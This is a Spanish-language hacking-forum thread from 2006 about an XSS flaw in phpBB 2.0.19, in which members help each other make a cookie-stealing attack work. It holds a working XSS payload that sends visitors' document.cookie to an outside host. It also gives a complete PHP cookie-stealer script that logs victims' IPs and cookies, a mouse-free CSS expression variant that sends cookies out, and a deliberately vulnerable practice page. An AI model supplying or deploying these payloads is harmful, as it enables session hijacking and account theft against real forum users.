phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit (Leído 2,200 veces)

Sarasa1

Desconectado

Mensajes: 6

phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

« en: 2 Febrero 2006, 16:05 »

Hola! Bueno miren tengo una duda;

Sobre el vurnerabilidad xss phpbb 2.0.19:

Citar

As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

No se como hacer funcionar el siguiente codigo:

Citar

<pre a=''>'' onmouseover=''document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie'' b=''<pre'' >

http://www.somesite.com/</pre>

Ya se que donde dice la url tengo que remplazarla por un cookie stealer, pero lo intengo y todavía no pillo como hacerlo funcionar!

Bueno es eso, es para aclararme la duda.
Muchas gracias!

Salu2

*info de http://www.milw0rm.com/


	En línea

sikik

Desconectado

Mensajes: 664

Jo sóc jo i la meva circumstància.

Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

« Respuesta #1 en: 2 Febrero 2006, 21:03 »

El archivo cookie_stealer.php es el siguiente:

Código:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer=getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
fclose($fl);
?>

Creas log.txt com chmod 777 y luego la gente que vea los posts con

Código:

<pre a=''>'' onmouseover=''document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie''b=''<pre'' >

con bbcode activada copiara sus cookies a log.txt

saludos.


	En línea

"Social Engineer -> Because there is no patch for human stupidity".

"Però qui s'ha inclinat sobre l'abisme, qui ha vist, patirà per sempre la temptació de tornar un altre cop a aquest punt negre en el qual les tenebres il·luminen(...)"

Warning: shell_exec() has been disabled for security reasons at line 274.

-sagitari-

Desconectado

Mensajes: 1.640

Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

« Respuesta #2 en: 2 Febrero 2006, 22:36 »

yo ahora probando de modificar los permisos a 777 en todos los hosts me dice que no puedo ; no such file or directory :-X

otras veces que lo he echo, si e podido :rolleyes:

:shocked:


	En línea

SeniorX

Desconectado

Mensajes: 1.347

Programador Novato

Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

« Respuesta #3 en: 2 Febrero 2006, 22:45 »

Cita de: GreenDeviL en 2 Febrero 2006, 22:36

yo ahora probando de modificar los permisos a 777 en todos los hosts me dice que no puedo ; no such file or directory :-X

otras veces que lo he echo, si e podido :rolleyes:

:shocked:

Yo solo sé que ese error es cuando no existe el archivo, asegurate de que estes dando la ruta correcta.


	En línea

Código:

try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

sirdarckcat

Troll Buena Onda y
CoAdmin

Desconectado

Mensajes: 6.947

Lavando Platos

Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

« Respuesta #4 en: 3 Febrero 2006, 00:28 »

interesante.. pero se puede hacer sin necesidad de pasar el mouse.

Código:

<pre oferta=">" style="hola:epresionje(open('http://www.google.com/search?q='+escape(document.cookie),'_self'))" adios="<pre ">

http://www.ha.ckers.org/xss.html

aunque esto ya se hablo en el foro.. ver "Los Poderes Secretos de XSS" en el foro de documentación, tambien hay una redistribución en seguridad0 me parece..


	En línea

Leer reglas

- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

Rey11

Desconectado

Mensajes: 3.244

Pequeña practica de ataques XSS

« Respuesta #5 en: 3 Febrero 2006, 23:28 »

Es una estupided, pero bueno. Les dejo esta web donde pueden practicar ataques XSS.
Este es el código:

Código:

<?php

if($e == "1"){
$dato = str_replace ( '\\\'', '\'', $dato ); //desactivacion de las magic quotes
echo 'Usted ha introducido el dato: '.$dato;
}else{
echo '<form action="datos.php" method=POST>
<input type="text" name=dato>
<input type="hidden" name=e value=1>
<input type="submit" value="Provar vulnerabilidad">
</form>';
}
?>

La url donde le he subido es:
http://hackersclub.profbh.com/manuales/datos.php
Saludos ::)


	En línea

http://www.smforos.net

Robin

Desconectado

Mensajes: 18

Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

« Respuesta #6 en: 6 Febrero 2006, 20:00 »

Casi todos los forms tiene el HTML off..
hay algun exploit encienda el html?

:rolleyes:


	En línea

Rey11

Desconectado

Mensajes: 3.244

Re: phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit

« Respuesta #7 en: 6 Febrero 2006, 20:13 »

Segun mi opinion el html devería estar off en todos los foros y solo usar bb codes..., que luego pasa lo que pasa

Saludos

P.D algien podría decirme en que funcion se encuentra lo de los bbcode en el phpbb, por provar haber si le encuento algun fallo


	En línea

http://www.smforos.net

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	sobre Remote File Disclosure Nivel Web	sancakoky	2	1,252	23 Noviembre 2010, 12:31 por sancakoky